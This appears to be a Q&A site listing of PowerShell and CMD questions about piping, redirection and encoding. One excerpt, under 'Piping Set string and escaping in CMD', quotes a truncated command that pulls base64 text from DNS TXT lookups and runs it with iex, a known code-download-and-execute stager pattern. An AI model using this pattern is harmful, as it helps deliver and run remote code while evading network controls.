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2 answers

Pipe .exe output to text file

I have a utility exe which opens a new window when I run the exe directly or through powershell. How do I pipe its output to a text file? I have used utility.exe > textino.txt But it creates a ...
srt243's user avatar
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Redirect the Windows console output of a Python script without raising UnicodeEncodeError

I have a Python script called which can be simplified for the sake of the question to: s = "∞" print(s) If I run the script in the Windows console, I get the expected output: ...
Wok's user avatar
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1 answer

Delete trailing hashes in a list of URLs using powershell?

I got a bit rusty with PowerShell, and I am missing the correct search terms, so I hoping asking here is ok. I have list of URL of the following structure: /pub/pdf/ssm.supervisorymanual.en.pdf?...
B--rian's user avatar
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2 answers

Unattended WSL Ubuntu 18.04 installation from powershell

Scenario To automatically install and initialize WSL Ubuntu 18.04 with powershell, I am trying to initialize/set the first username and password automatically. However, when I first run the wsl from a ...
a.t.'s user avatar
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1 answer

How do i execute powershell command's with pipes in python?

import subprocess subprocess.Popen('powershell.exe [Get-ADPrincipalGroupMembership %USERNAME% | select name]') os.system('powershell.exe Get-ADPrincipalGroupMembership %USERNAME% | select name]') I ...
Lumbercrack's user avatar
1 vote
3 answers

Piping Set string and escaping in CMD

I'm trying to do: echo|set /P="powershell "$b64=""; (1..2) | ForEach-Object { $b64+=(nslookup -q=txt "$")[-1] }; iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::...
rusokiwi's user avatar
0 votes
1 answer

How to redirect input in Powershell without BOM?

I am trying to redirect input in Powershell by Get-Content input.txt | my-program args The problem is the piped text is preceded with a BOM (0xefbbbf), and my program cannot handle that correctly. ...
user's user avatar
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2 answers

How to pipe input to Wireshark in Windows Power Shell?

I am trying to run the following command in Power Shell: C:\Users\mne\Desktop\plink.exe -ssh -pw abc root@myhost "tcpdump -w - -U -i vethf90673c 'port 5000'" | &"C:\Program Files\Wireshark\...
Mohammed Noureldin's user avatar
10 votes
2 answers

filter outputs using select-string pipes

In bash, if I do the following, I will get all the environment variables with wd in them. env | grep "wd" Now, in Powershell, I know I could do get-childitem env:wd* But I want to pipe to select-...
JL Peyret's user avatar
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15 votes
3 answers

Pipe file content into PowerShell command without loading the entire file to memory

I've recently started using PowerShell, hoping to never miss Bash again. I want to restore an instance of a PostgreSQL database. In Bash, or in the old command prompt, I would type: psql --...
zmbq's user avatar
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33 votes
3 answers

Using -replace on pipes in powershell

I want to test out a replace before I use it, so I'm trying to write a quick online command to see what the output is. However, I'm not sure what the syntax is. What I want to do is something like ...
David says Reinstate Monica's user avatar
4 votes
6 answers

How can I both pipe and display output in Windows' command line?

I have a process I need to run within a batch file. This process produces some output. I need to both display this output to the screen and send (pipe) it to another program. The bash method uses tee:...
Bob's user avatar
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59 votes
6 answers

Why does Powershell silently convert a string array with one item to a string

Consider the following Powershell script, which searches for folders in C:\ with a 'og' in their name: PS C:\> (ls | %{$_.Name} | ?{$_.Contains("og")}) PerfLogs Program Files setup.log Now I narrow ...
Jonas Sourlier's user avatar